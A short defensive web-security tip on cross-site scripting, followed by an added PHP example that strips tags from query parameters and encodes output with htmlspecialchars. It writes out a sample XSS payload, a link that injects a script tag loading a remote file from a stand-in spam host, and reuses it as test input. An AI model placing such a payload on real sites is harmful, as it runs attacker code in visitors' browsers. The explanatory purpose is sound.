This is called a cross-site scripting (XSS) attack.
People exploit it using nothing more than the input fields that a site generally provides, for example:
<A HREF="http://sitename.com/comment.cmi? mycomment=<SCRIPT SRC='http://spam-site/badfile'></SCRIPT>"> Click here</A>
There may be different ways to solve this. So far we have found one unique way: just use strip_tags on each $_GET value. If you think there are other methods or different ways, your comments and suggestions are welcome.
Solution by: Runwalsoft (Manish Runwal)
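The following is an added example, not the original author's code. It applies strip_tags to every $_GET value as suggested above and also shows output encoding with htmlspecialchars, because strip_tags removes tags but leaves quote characters in place. The helper names and the `nick` parameter are hypothetical, and the sample input is constructed.

```php
<?php
// Added example, not the original author's code. The parameter name
// "mycomment" is taken from the link above; helper names are hypothetical.

/** The page's approach: strip HTML tags from every $_GET value (arrays included). */
function strip_tags_deep($value)
{
    return is_array($value)
        ? array_map('strip_tags_deep', $value)
        : strip_tags((string) $value);
}

/** Output encoding for HTML text and quoted attribute values. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input standing in for a real query string.
$_GET = [
    'mycomment' => "Nice post<SCRIPT SRC='http://spam-site/badfile'></SCRIPT>",
    'nick'      => 'bob" class="injected',
];

$clean = strip_tags_deep($_GET);

// The script tag is removed, so the link shown above no longer loads the remote file.
echo $clean['mycomment'], PHP_EOL;

// strip_tags() leaves quote characters alone, so this value would still close
// a value="..." attribute early if it were echoed without encoding.
echo $clean['nick'], PHP_EOL;

// Encoding at output time keeps the value inside the attribute.
printf('<input name="nick" value="%s">' . PHP_EOL, html_escape($clean['nick']));
printf('<p>%s</p>' . PHP_EOL, html_escape($clean['mycomment']));
```

Run it with the PHP command-line interpreter and compare the second and third output lines: the quote survives strip_tags and is only neutralised once it is encoded for output.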